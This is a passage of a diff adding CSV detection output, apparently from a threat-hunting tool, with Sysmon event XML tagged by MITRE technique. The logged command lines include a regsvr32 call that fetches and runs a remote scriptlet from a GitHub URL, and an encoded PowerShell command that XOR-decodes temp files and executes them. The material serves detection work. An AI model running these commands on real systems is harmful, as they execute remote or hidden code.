+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ParentProcessId"">1200</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">Powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot;  /user ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:00:09.977481Z"">
+    </TimeCreated>
+    <EventRecordID>24</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:00:09.677</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AD19-5CB8-0000-0010F4F40C00</Data>
+    <Data Name=""ProcessId"">3980</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /user</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
+    <Data Name=""LogonId"">0xca21</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ParentProcessId"">1200</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">Powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
+    </TimeCreated>
+    <EventRecordID>17287</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""276"" ThreadID=""1000"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-13 18:03:19.497</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
+    <Data Name=""ProcessId"">2476</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-00201D340100</Data>
+    <Data Name=""LogonId"">0x1341d</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
+    <Data Name=""ParentProcessId"">944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
+    </TimeCreated>
+    <EventRecordID>17287</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""276"" ThreadID=""1000"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-13 18:03:19.497</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
+    <Data Name=""ProcessId"">2476</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-00201D340100</Data>
+    <Data Name=""LogonId"">0x1341d</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
+    <Data Name=""ParentProcessId"">944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
+    </TimeCreated>
+    <EventRecordID>17287</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""276"" ThreadID=""1000"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-13 18:03:19.497</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
+    <Data Name=""ProcessId"">2476</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-00201D340100</Data>
+    <Data Name=""LogonId"">0x1341d</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
+    <Data Name=""ParentProcessId"">944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-17T20:18:09.643112Z"">
+    </TimeCreated>
+    <EventRecordID>5275</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1852"" ThreadID=""464"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC04.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-17 20:18:09.593</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AB81-5C8E-0000-00102E9E0C00</Data>
+    <Data Name=""ProcessId"">3892</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">PC04\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
+    <Data Name=""LogonId"">0x3c004</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-173D-5C8F-0000-00102A6A0000</Data>
+    <Data Name=""ParentProcessId"">608</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
+  </EventData>
+</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-17T20:18:09.643112Z"">
+    </TimeCreated>
+    <EventRecordID>5275</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1852"" ThreadID=""464"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC04.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-17 20:18:09.593</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AB81-5C8E-0000-00102E9E0C00</Data>
+    <Data Name=""ProcessId"">3892</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">PC04\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
+    <Data Name=""LogonId"">0x3c004</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-173D-5C8F-0000-00102A6A0000</Data>
+    <Data Name=""ParentProcessId"">608</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
+  </EventData>
+</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-17T20:18:09.643112Z"">
+    </TimeCreated>
+    <EventRecordID>5275</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1852"" ThreadID=""464"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC04.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-17 20:18:09.593</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AB81-5C8E-0000-00102E9E0C00</Data>
+    <Data Name=""ProcessId"">3892</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">PC04\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
+    <Data Name=""LogonId"">0x3c004</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-173D-5C8F-0000-00102A6A0000</Data>
+    <Data Name=""ParentProcessId"">608</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
+  </EventData>
+</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.110469,2019-05-27T05:29:17.110469+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppools /text:name ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.110469Z"">
+    </TimeCreated>
+    <EventRecordID>5880</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.070</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010575CFF00</Data>
+    <Data Name=""ProcessId"">2644</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppools /text:name</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[  T1003 ] Credential Dumping ImageLoad,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,Medium,[  T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:58:14.871968Z"">
+    </TimeCreated>
+    <EventRecordID>23</EventRecordID>
